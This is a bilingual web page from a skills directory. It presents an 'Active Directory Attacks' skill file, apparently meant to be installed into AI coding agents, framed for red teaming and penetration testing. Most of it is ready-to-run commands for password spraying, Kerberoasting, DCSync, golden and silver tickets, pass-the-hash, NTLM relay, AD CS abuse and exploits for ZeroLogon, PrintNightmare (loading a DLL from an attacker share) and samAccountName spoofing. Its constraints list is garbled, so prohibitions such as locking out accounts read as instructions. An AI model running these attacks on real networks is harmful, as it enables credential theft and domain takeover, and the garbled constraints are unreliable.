S
SkillsMD 发现、学习和掌握最新的 AI 技术 Skills。基于真实社区数据,为开发者提供最权威的 AI 工具导航。
关于 聚焦 AI 技术 Skills 每周数据更新 中英双语文档 © 2026 SkillsMD. All rights reserved.
Active Directory攻击技术全解:Kerberos攻击、横向移动与权限提升实战指南 | SkillsMD
首页 / Skills / active-directory-attacks Active Directory攻击技术全解:Kerberos攻击、横向移动与权限提升实战指南 Active Directory Attacks by automindtechnologie-jpg/ultimate-skill.md
npx skills add https://github.com/automindtechnologie-jpg/ultimate-skill.md --skill 'Active Directory Attacks'🇨🇳 中文介绍 Active Directory 攻击
目的
提供针对 Microsoft Active Directory 环境进行攻击的全面技术。涵盖红队行动和渗透测试中的侦察、凭据收集、Kerberos 攻击、横向移动、权限提升和域控。
输入/先决条件
Kali Linux 或 Windows 攻击平台
域用户凭据(用于大多数攻击)
对域控制器的网络访问权限
工具:Impacket、Mimikatz、BloodHound、Rubeus、CrackMapExec
输出/交付成果
域枚举数据
提取的凭据和哈希值
用于身份冒充的 Kerberos 票据
域管理员访问权限
持久化访问机制
必备工具
工具 用途 BloodHound AD 攻击路径可视化 Impacket Python AD 攻击工具集 Mimikatz 凭据提取 Rubeus Kerberos 攻击 CrackMapExec 网络利用 PowerView AD 枚举 Responder LLMNR/NBT-NS 投毒
核心工作流程
步骤 1:Kerberos 时钟同步
🇺🇸 English Active Directory Attacks
Purpose
Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.
Inputs/Prerequisites
Kali Linux or Windows attack platform
Domain user credentials (for most attacks)
Network access to Domain Controller
Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec
Outputs/Deliverables
Domain enumeration data
Extracted credentials and hashes
Kerberos tickets for impersonation
Domain Administrator access
Persistent access mechanisms
Essential Tools
Tool Purpose BloodHound AD attack path visualization Impacket Python AD attack tools Mimikatz Credential extraction Rubeus Kerberos attacks CrackMapExec Network exploitation
广告位招租
在这里展示您的产品或服务
触达数万 AI 开发者,精准高效
联系我们 # 检测时钟偏差
nmap -sT 10.10.10.10 -p445 --script smb2-time
# 在 Linux 上修正时钟
sudo date -s "14 APR 2024 18:25:16"
# 在 Windows 上修正时钟
net time /domain /set
# 在不更改系统时间的情况下伪造时钟
faketime -f '+8h' <command>
步骤 2:使用 BloodHound 进行 AD 侦察 # 启动 BloodHound
neo4j console
bloodhound --no-sandbox
# 使用 SharpHound 收集数据
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
# Python 收集器(从 Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
步骤 3:PowerView 枚举 # 获取域信息
Get-NetDomain
Get-DomainSID
Get-NetDomainController
# 枚举用户
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset
# 枚举组
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
# 查找本地管理员访问权限
Find-LocalAdminAccess -Verbose
# 用户追踪
Invoke-UserHunter
Invoke-UserHunter -Stealth
凭据攻击
密码喷洒 # 使用 kerbrute
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
# 使用 CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
Kerberoasting # Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
# CrackMapExec
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
# 使用 hashcat 破解
hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting 针对设置了"不需要 Kerberos 预认证"的账户:
# Impacket
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# 使用 hashcat 破解
hashcat -m 18200 hashes.txt rockyou.txt
DCSync 攻击 直接从 DC 提取凭据(需要 Replicating Directory Changes 权限):
# Impacket
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
# Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator
Kerberos 票据攻击
票据传递攻击(黄金票据) # 首先通过 DCSync 获取 krbtgt 哈希
# Mimikatz - 创建黄金票据
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
白银票据 # Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
哈希传递攻击 # Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
# CrackMapExec
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
超哈希传递攻击 将 NTLM 哈希转换为 Kerberos 票据:
# Impacket
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache
# Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
NTLM 中继攻击
Responder + ntlmrelayx # 启动 Responder(禁用 SMB/HTTP 以进行中继)
responder -I eth0 -wrf
# 启动中继
ntlmrelayx.py -tf targets.txt -smb2support
# LDAP 中继用于委派攻击
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
SMB 签名检查 crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
证书服务攻击(AD CS)
ESC1 - 配置错误的模板 # 查找易受攻击的模板
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
# 利用 ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
# 使用证书进行身份验证
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
ESC8 - Web 注册中继 ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
关键 CVE
ZeroLogon (CVE-2020-1472) # 检查漏洞
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
# 利用
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
# 提取哈希
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
# 恢复密码(重要!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
PrintNightmare (CVE-2021-1675) # 检查漏洞
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
# 利用(需要托管恶意 DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
samAccountName 欺骗 (CVE-2021-42278/42287) # 自动化利用
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
快速参考 攻击类型 工具 命令 Kerberoast Impacket GetUserSPNs.py domain/user:pass -requestAS-REP Roast Impacket GetNPUsers.py domain/ -usersfile users.txtDCSync secretsdump secretsdump.py domain/admin:pass@DCPass-the-Hash psexec psexec.py domain/user@target -hashes :HASHGolden Ticket Mimikatz kerberos::golden /user:Admin /krbtgt:HASHSpray kerbrute kerbrute passwordspray -d domain users.txt Pass
约束条件
在进行 Kerberos 攻击前与 DC 同步时间
拥有有效的域凭据以进行大多数攻击
记录所有被攻陷的账户
因过度密码喷洒而锁定账户
未经批准修改生产 AD 对象
在未记录的情况下遗留黄金票据
运行 BloodHound 以发现攻击路径
在中继攻击前检查 SMB 签名
验证 CVE 利用的补丁级别
示例
示例 1:通过 Kerberoasting 攻陷域 # 1. 查找具有 SPN 的服务账户
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
# 2. 请求 TGS 票据
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
# 3. 破解票据
hashcat -m 13100 tgs.txt rockyou.txt
# 4. 使用破解的服务账户
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
示例 2:NTLM 中继到 LDAP # 1. 启动针对 LDAP 的中继
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
# 2. 触发身份验证(例如,通过 PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
# 3. 使用创建的机器账户进行 RBCD 攻击
故障排除 问题 解决方案 时钟偏差过大 与 DC 同步时间或使用 faketime Kerberoasting 返回空结果 没有具有 SPN 的服务账户 DCSync 访问被拒绝 需要 Replicating Directory Changes 权限 NTLM 中继失败 检查 SMB 签名,尝试 LDAP 目标 BloodHound 为空 验证收集器是否使用正确的凭据运行
附加资源 Responder LLMNR/NBT-NS poisoning
Core Workflow
Step 1: Kerberos Clock Sync Kerberos requires clock synchronization (±5 minutes):
# Detect clock skew
nmap -sT 10.10.10.10 -p445 --script smb2-time
# Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"
# Fix clock on Windows
net time /domain /set
# Fake clock without changing system time
faketime -f '+8h' <command>
Step 2: AD Reconnaissance with BloodHound # Start BloodHound
neo4j console
bloodhound --no-sandbox
# Collect data with SharpHound
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass
# Python collector (from Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all
Step 3: PowerView Enumeration # Get domain info
Get-NetDomain
Get-DomainSID
Get-NetDomainController
# Enumerate users
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset
# Enumerate groups
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
# Find local admin access
Find-LocalAdminAccess -Verbose
# User hunting
Invoke-UserHunter
Invoke-UserHunter -Stealth
Credential Attacks
Password Spraying # Using kerbrute
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
# Using CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success
Kerberoasting Extract service account TGS tickets and crack offline:
# Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
# CrackMapExec
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt
AS-REP Roasting Target accounts with "Do not require Kerberos preauthentication":
# Impacket
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# Crack with hashcat
hashcat -m 18200 hashes.txt rockyou.txt
DCSync Attack Extract credentials directly from DC (requires Replicating Directory Changes rights):
# Impacket
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
# Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator
Kerberos Ticket Attacks
Pass-the-Ticket (Golden Ticket) Forge TGT with krbtgt hash for any user:
# Get krbtgt hash via DCSync first
# Mimikatz - Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
Silver Ticket Forge TGS for specific service:
# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
Pass-the-Hash # Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
# CrackMapExec
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
OverPass-the-Hash Convert NTLM hash to Kerberos ticket:
# Impacket
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache
# Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
NTLM Relay Attacks
Responder + ntlmrelayx # Start Responder (disable SMB/HTTP for relay)
responder -I eth0 -wrf
# Start relay
ntlmrelayx.py -tf targets.txt -smb2support
# LDAP relay for delegation attack
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
SMB Signing Check crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
Certificate Services Attacks (AD CS)
ESC1 - Misconfigured Templates # Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
# Exploit ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
ESC8 - Web Enrollment Relay ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Critical CVEs
ZeroLogon (CVE-2020-1472) # Check vulnerability
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
# Exploit
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
# Extract hashes
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
# Restore password (important!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
PrintNightmare (CVE-2021-1675) # Check for vulnerability
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
# Exploit (requires hosting malicious DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
samAccountName Spoofing (CVE-2021-42278/42287) # Automated exploitation
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
Quick Reference Attack Tool Command Kerberoast Impacket GetUserSPNs.py domain/user:pass -requestAS-REP Roast Impacket GetNPUsers.py domain/ -usersfile users.txtDCSync secretsdump secretsdump.py domain/admin:pass@DCPass-the-Hash psexec psexec.py domain/user@target -hashes :HASHGolden Ticket Mimikatz kerberos::golden /user:Admin /krbtgt:HASHSpray kerbrute kerbrute passwordspray -d domain users.txt Pass
Constraints
Synchronize time with DC before Kerberos attacks
Have valid domain credentials for most attacks
Document all compromised accounts
Lock out accounts with excessive password spraying
Modify production AD objects without approval
Leave Golden Tickets without documentation
Run BloodHound for attack path discovery
Check for SMB signing before relay attacks
Verify patch levels for CVE exploitation
Examples
Example 1: Domain Compromise via Kerberoasting # 1. Find service accounts with SPNs
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
# 2. Request TGS tickets
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
# 3. Crack tickets
hashcat -m 13100 tgs.txt rockyou.txt
# 4. Use cracked service account
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
Example 2: NTLM Relay to LDAP # 1. Start relay targeting LDAP
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
# 2. Trigger authentication (e.g., via PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
# 3. Use created machine account for RBCD attack
Troubleshooting Issue Solution Clock skew too great Sync time with DC or use faketime Kerberoasting returns empty No service accounts with SPNs DCSync access denied Need Replicating Directory Changes rights NTLM relay fails Check SMB signing, try LDAP target BloodHound empty Verify collector ran with correct creds
Additional Resources For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see references/advanced-attacks.md .
通过 LiteLLM 代理让 Claude Code 对接 GitHub Copilot 运行 | 高级变通方案指南
27,600 周安装
